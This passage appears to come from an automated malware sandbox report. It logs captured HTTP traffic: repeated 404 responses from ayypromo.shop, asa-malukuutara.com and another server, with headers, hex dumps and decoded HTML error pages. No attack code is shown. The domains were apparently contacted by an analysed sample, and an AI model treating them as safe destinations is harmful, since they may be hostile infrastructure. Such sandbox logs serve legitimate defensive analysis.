3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=CA7302n0o7hNsgNbFqiI; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:10 GMTDate: Tue, 27 Aug 2024 06:01:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 340Last-Modified: Tue, 29 May 2018 17:41:27 GMTETag: "154-56d5bbe607fc0"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: ddos-guardConnection: closeSet-Cookie: __ddg1_=F0QVtNqKeWjLisP5NyP2; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Wed, 27-Aug-2025 06:01:13 GMTDate: Tue, 27 Aug 2024 06:01:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 738Last-Modified: Sun, 11 Jun 2023 21:19:31 GMTETag: "2e2-5fde1286ba692"Accept-Ranges: bytesX-Frame-Options: SAMEORIGINData Raw: 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 2f 68 65 61 64 3e 0a 20 20 20 20 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 73 61 6e 73 2d 73 65 72 69 66 3b 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 69 6d 67 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 77 69 64 74 68 3d 22 31 32 30 22 20 68 65 69 67 68 74 3d 22 38 38 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 72 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 3e 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 62 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 64 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 74 72 3e 0a 20 20 20 20 20 20 20 20 3c 2f 74 61 62 6c 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html> <head> <meta name="robots" content="noindex"> <title>404 Page Not Found.</title> </head> <body style="background-color:#eee;"> <table style="width:100%; height:100%;"> <tr> <td style="vertical-align: middle; text-align: center; font-family: sans-serif;"> <a href="
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:03:13 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb f1 e8 95 55 53 3c 28 32 f5 d2 02 e2 69 5c 17 e5 86 21 6f 15 19 29 d4 cc 3b 82 df b4 6e fa 62 40 2e d9 62 8e c2 02 f2 7e 14 a2 f8 85 a4 ed 8c 23 44 16 20 83 22 b1 8b 9a a1 d5 bc c8 bd 66 eb f3 a0 0f fd 8b 79 d4 de 9b 6e e7 a0 82 11 95 d1 b1 1f b6 6d 19 6e ea 8a a7 f0 29 74 ec 3c 75 a7 f4 34 05 26 7b 0a ab 69 e5 29 44 f0 16 3c 85 22 61 9c 45 4f 61 26 2f 99 7c 0a 11 41 fa e2 51 81 ea c7 13 01 22 c8 9d 76 38 47 dc 69 f7 b1 c5 9d 76 bf 7e df c7 9d 1e d5 1f 6d ad 6f 32 a2 ba ef 6a e5 83 8a 38 f0 cd c6 92 9d 4f e1 79 a0 b5 76 fc 29 7c 71 0b 31 74 4a ab 7f ca 9a ab 57 7e d2 b6 4a 59 ca 04 9a a6 72 1e de 5e ed 68 01 27 10 8d 83 71 30 07 29 a5 72 7d 6f dd c0 6d 38 bf 9a b1 b3 25 30 a4 13 4f 7b f4 c4 11 5d ae 7b 24 d4 81 1e f1 f6 6d fd 98 af c6 ca 7c 9b ef da 79 57 68 22 fa cb 85 80 15 4f 17 f0 2d 3f ea af db 00 4f a5 d3 ce 99 be 7b f4 bd 55 3b cd 9c f6 0f 5e 1f 82 9e 08 dd 84 09 ca dd cd f6 2d f0 18 eb 2f d7 69 3c 4e 13 09 2b 87 8c 78 f2 2a 9a 09 9c d7 e1 9b ae 7d c0 09 27 9a d5 aa 3b 29 c7 2a b9 5a 24 76 75 f5 3a 60 a2 d9 d6 b4 ed 77 7d f1 81 27 9c f0 16 25 f3 15 a5 2f fd 87 e9 7c 24 ef ac 55 6f 81 66 3b ed 85 e6 19 7f 52 5e a1 8f d9 6c bc 3f 2a 4c 6c 15 d0 b5 a6 eb 09 42 91 6a 1b 2a 9e 35 02 e6 54 9e 4d 9a f8 b6 ea 8f 03 ba aa 2a fb d3 3f 4f 98 c9 77 3f 92 f0 be 71 e0 f1 58 2b a7 51 b3 32 84 8a c0 80 ea 6d 45 4f c7 26 8f ea a7 63 b3 dd 46 4f c7 ad e6 db a7 a3 e4 bc 79 3a ca 54 65 4b 5b 43 a0 6b 6f 2e 03 ff 72 25 8a 2b d4 07 36 5b f5 f7 bc 11 5a 4d 88 74 a0 e5 f0 cd cd e5 41 db 6d fc a0 4d cc 0f ac d3 ec ef be b2 6f d2 82 0e d3 28 4b 4d 39 26 41 0f c0 2d 5d b7 5c
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:03:16 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb f1 e8 95 55 53 3c 28 32 f5 d2 02 e2 69 5c 17 e5 86 21 6f 15 19 29 d4 cc 3b 82 df b4 6e fa 62 40 2e d9 62 8e c2 02 f2 7e 14 a2 f8 85 a4 ed 8c 23 44 16 20 83 22 b1 8b 9a a1 d5 bc c8 bd 66 eb f3 a0 0f fd 8b 79 d4 de 9b 6e e7 a0 82 11 95 d1 b1 1f b6 6d 19 6e ea 8a a7 f0 29 74 ec 3c 75 a7 f4 34 05 26 7b 0a ab 69 e5 29 44 f0 16 3c 85 22 61 9c 45 4f 61 26 2f 99 7c 0a 11 41 fa e2 51 81 ea c7 13 01 22 c8 9d 76 38 47 dc 69 f7 b1 c5 9d 76 bf 7e df c7 9d 1e d5 1f 6d ad 6f 32 a2 ba ef 6a e5 83 8a 38 f0 cd c6 92 9d 4f e1 79 a0 b5 76 fc 29 7c 71 0b 31 74 4a ab 7f ca 9a ab 57 7e d2 b6 4a 59 ca 04 9a a6 72 1e de 5e ed 68 01 27 10 8d 83 71 30 07 29 a5 72 7d 6f dd c0 6d 38 bf 9a b1 b3 25 30 a4 13 4f 7b f4 c4 11 5d ae 7b 24 d4 81 1e f1 f6 6d fd 98 af c6 ca 7c 9b ef da 79 57 68 22 fa cb 85 80 15 4f 17 f0 2d 3f ea af db 00 4f a5 d3 ce 99 be 7b f4 bd 55 3b cd 9c f6 0f 5e 1f 82 9e 08 dd 84 09 ca dd cd f6 2d f0 18 eb 2f d7 69 3c 4e 13 09 2b 87 8c 78 f2 2a 9a 09 9c d7 e1 9b ae 7d c0 09 27 9a d5 aa 3b 29 c7 2a b9 5a 24 76 75 f5 3a 60 a2 d9 d6 b4 ed 77 7d f1 81 27 9c f0 16 25 f3 15 a5 2f fd 87 e9 7c 24 ef ac 55 6f 81 66 3b ed 85 e6 19 7f 52 5e a1 8f d9 6c bc 3f 2a 4c 6c 15 d0 b5 a6 eb 09 42 91 6a 1b 2a 9e 35 02 e6 54 9e 4d 9a f8 b6 ea 8f 03 ba aa 2a fb d3 3f 4f 98 c9 77 3f 92 f0 be 71 e0 f1 58 2b a7 51 b3 32 84 8a c0 80 ea 6d 45 4f c7 26 8f ea a7 63 b3 dd 46 4f c7 ad e6 db a7 a3 e4 bc 79 3a ca 54 65 4b 5b 43 a0 6b 6f 2e 03 ff 72 25 8a 2b d4 07 36 5b f5 f7 bc 11 5a 4d 88 74 a0 e5 f0 cd cd e5 41 db 6d fc a0 4d cc 0f ac d3 ec ef be b2 6f d2 82 0e d3 28 4b 4d 39 26 41 0f c0 2d 5d b7 5c
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:03:19 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://asa-malukuutara.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: brContent-Length: 12523Content-Type: text/html; charset=UTF-8Data Raw: 53 06 02 41 11 a9 49 3f 04 54 04 c6 4d 7c ac f3 7c ff 99 a9 7d 67 e9 72 7a 86 2b 16 e1 00 20 00 ae 22 43 f5 77 9c 5e 5c 93 4c ba e2 e4 6f b1 4b 03 91 90 04 9b 22 39 00 b4 b8 d9 fc ff fd a5 d5 64 a6 61 0a 67 16 08 65 b7 b4 04 1c da f7 de f7 5e f7 87 aa 3d bf 24 79 b6 24 d9 e7 94 2c f7 1e 19 7a 8f 64 e8 e6 f7 ee 83 ff 0b c5 06 99 b8 7b c1 f6 10 60 16 2c 62 92 6c 12 d7 70 79 7a 61 80 c2 89 37 a2 20 4a f6 31 4c 6b b7 bf cf ba eb 12 44 44 45 40 4d da 7b 89 cb 63 f3 9a 60 a9 46 79 31 91 a9 e1 8c 0d fd 41 ec 93 bc 55 22 99 ef ab 0c d5 66 f7 42 62 1b 43 c9 29 20 75 5b c6 d4 b2 d9 bd ee 17 39 09 57 03 44 62 5d 94 80 c1 d5 9c 6b c0 a4 8b 57 48 77 f4 c7 e3 1c 07 73 4f 8b 42 bc 6f ac 50 ce cb b5 c4 73 59 58 0a 88 1c da 0d 45 5d 15 f5 10 81 04 53 06 57 2a 81 4b 7f 8b 17 05 60 a3 5b 7c 4c 2c 0e ea b2 1b 8c 41 3a 24 34 2e 92 1a 2f 02 53 92 81 83 db a0 eb 3d 70 2c 82 e2 fb c7 13 a2 84 bb c7 3b fa e5 ee f3 8f ef fb 3c 7b 49 f3 0f ad e9 5e c1 ea b6 5a 34 9d 43 7a 19 5b ed eb fd 62 b7 0d 2f 3d 0c 95 53 f4 a0 da e3 eb f1 e8 95 55 53 3c 28 32 f5 d2 02 e2 69 5c 17 e5 86 21 6f 15 19 29 d4 cc 3b 82 df b4 6e fa 62 40 2e d9 62 8e c2 02 f2 7e 14 a2 f8 85 a4 ed 8c 23 44 16 20 83 22 b1 8b 9a a1 d5 bc c8 bd 66 eb f3 a0 0f fd 8b 79 d4 de 9b 6e e7 a0 82 11 95 d1 b1 1f b6 6d 19 6e ea 8a a7 f0 29 74 ec 3c 75 a7 f4 34 05 26 7b 0a ab 69 e5 29 44 f0 16 3c 85 22 61 9c 45 4f 61 26 2f 99 7c 0a 11 41 fa e2 51 81 ea c7 13 01 22 c8 9d 76 38 47 dc 69 f7 b1 c5 9d 76 bf 7e df c7 9d 1e d5 1f 6d ad 6f 32 a2 ba ef 6a e5 83 8a 38 f0 cd c6 92 9d 4f e1 79 a0 b5 76 fc 29 7c 71 0b 31 74 4a ab 7f ca 9a ab 57 7e d2 b6 4a 59 ca 04 9a a6 72 1e de 5e ed 68 01 27 10 8d 83 71 30 07 29 a5 72 7d 6f dd c0 6d 38 bf 9a b1 b3 25 30 a4 13 4f 7b f4 c4 11 5d ae 7b 24 d4 81 1e f1 f6 6d fd 98 af c6 ca 7c 9b ef da 79 57 68 22 fa cb 85 80 15 4f 17 f0 2d 3f ea af db 00 4f a5 d3 ce 99 be 7b f4 bd 55 3b cd 9c f6 0f 5e 1f 82 9e 08 dd 84 09 ca dd cd f6 2d f0 18 eb 2f d7 69 3c 4e 13 09 2b 87 8c 78 f2 2a 9a 09 9c d7 e1 9b ae 7d c0 09 27 9a d5 aa 3b 29 c7 2a b9 5a 24 76 75 f5 3a 60 a2 d9 d6 b4 ed 77 7d f1 81 27 9c f0 16 25 f3 15 a5 2f fd 87 e9 7c 24 ef ac 55 6f 81 66 3b ed 85 e6 19 7f 52 5e a1 8f d9 6c bc 3f 2a 4c 6c 15 d0 b5 a6 eb 09 42 91 6a 1b 2a 9e 35 02 e6 54 9e 4d 9a f8 b6 ea 8f 03 ba aa 2a fb d3 3f 4f 98 c9 77 3f 92 f0 be 71 e0 f1 58 2b a7 51 b3 32 84 8a c0 80 ea 6d 45 4f c7 26 8f ea a7 63 b3 dd 46 4f c7 ad e6 db a7 a3 e4 bc 79 3a ca 54 65 4b 5b 43 a0 6b 6f 2e 03 ff 72 25 8a 2b d4 07 36 5b f5 f7 bc 11 5a 4d 88 74 a0 e5 f0 cd cd e5 41 db 6d fc a0 4d cc 0f ac d3 ec ef be b2 6f d2 82 0e d3 28 4b 4d 39 26 41 0f c0 2d 5d b7 5c
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:04:29 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 20 20 78 3d 22 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 79 3d 22 2d 30 2e 35 22 0a 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 32 22 0a 20 20 20 20 20 20 20 20 20 20 20 69 64 3d 22 72 65 63 74 35 34 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 3c 2f 70 61 74 74 65 72 6e 3e 0a 20 20 20 20 20 20 3c 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 0a 20 20 20 20 20 20 20 20 20 6f 73 62 3a 70 61 69 6e 74 3d 22 73 6f 6c 69 64 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 6c 69 6e 65 61 72 47 72 61 64 69 65 6e 74 36 30 39 36 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 27 Aug 2024 06:04:32 GMTServer: ApacheContent-Length: 16052Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 32 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 6d 61 69 6e 3e 0a 20 3c 73 76 67 0a 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 35 34 31 2e 31 37 32 30 36 20 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 68 65 69 67 68 74 3d 22 33 32 38 2e 34 35 31 38 34 22 0a 20 20 20 20 20 77 69 64 74 68 3d 22 35 34 31 2e 31 37 32 30 36 22 0a 20 20 20 20 20 69 64 3d 22 73 76 67 32 22 0a 20 20 20 20 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 64 61 74 61 0a 20 20 20 20 20 20 20 69 64 3d 22 6d 65 74 61 64 61 74 61 38 22 3e 0a 20 20 20 20 3c 2f 6d 65 74 61 64 61 74 61 3e 0a 20 20 20 20 3c 64 65 66 73 0a 20 20 20 20 20 20 20 69 64 3d 22 64 65 66 73 36 22 3e 0a 20 20 20 20 20 20 3c 70 61 74 74 65 72 6e 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 0a 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3d 22 31 2e 35 22 0a 20 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3d 22 31 22 0a 20 20 20 20 20 20 20 20 20 70 61 74 74 65 72 6e 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 30 2c 30 29 20 73 63 61 6c 65 28 31 30 2c 31 30 29 22 0a 20 20 20 20 20 20 20 20 20 69 64 3d 22 53 74 72 69 70 73 32 5f 31 22 3e 0a 20 20 20 20 20 20 20 20 3c 72 65 63 74 0a 20 20 20 20 20 20 20 20 20 20 20 73 74 79 6c 65 3d 22 66 69 6c 6c 3a 62 6c 61 63 6b 3b 73 74 72 6f 6b 65 3a 6e 6f 6e 65 22 0a 20 20 20 20 20 20 20 20 20 